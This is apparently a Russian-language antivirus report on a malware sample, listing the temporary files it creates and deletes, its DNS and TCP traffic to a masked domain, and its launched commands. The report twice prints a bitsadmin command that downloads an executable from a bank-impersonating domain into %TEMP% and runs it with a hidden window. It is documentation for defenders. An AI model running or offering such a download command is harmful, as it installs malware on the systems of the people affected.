Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\bitsadmin.exe' /transfer myFile /download /priority normal https://bangkokbankth.org/oror.exe %TEMP%\E-catalogue.exe
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cabd649.tmp
- %WINDIR%\temp\tard64a.tmp
- %WINDIR%\temp\cabec54.tmp
- %WINDIR%\temp\tarec55.tmp
- %WINDIR%\temp\cab28d.tmp
- %WINDIR%\temp\tar28e.tmp
- %WINDIR%\temp\cab3a9.tmp
- %WINDIR%\temp\tar3aa.tmp
- %WINDIR%\temp\cab1956.tmp
- %WINDIR%\temp\tar1957.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cabd649.tmp
- %WINDIR%\temp\tard64a.tmp
- %WINDIR%\temp\cabec54.tmp
- %WINDIR%\temp\tarec55.tmp
- %WINDIR%\temp\cab28d.tmp
- %WINDIR%\temp\tar28e.tmp
- %WINDIR%\temp\cab3a9.tmp
- %WINDIR%\temp\tar3aa.tmp
- %WINDIR%\temp\cab1956.tmp
- %WINDIR%\temp\tar1957.tmp
Сетевая активность
TCP
- 'ba####kbankth.org':443
UDP
- DNS ASK ba####kbankth.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\bitsadmin.exe' /transfer myFile /download /priority normal https://bangkokbankth.org/oror.exe %TEMP%\E-catalogue.exe' (со скрытым окном)
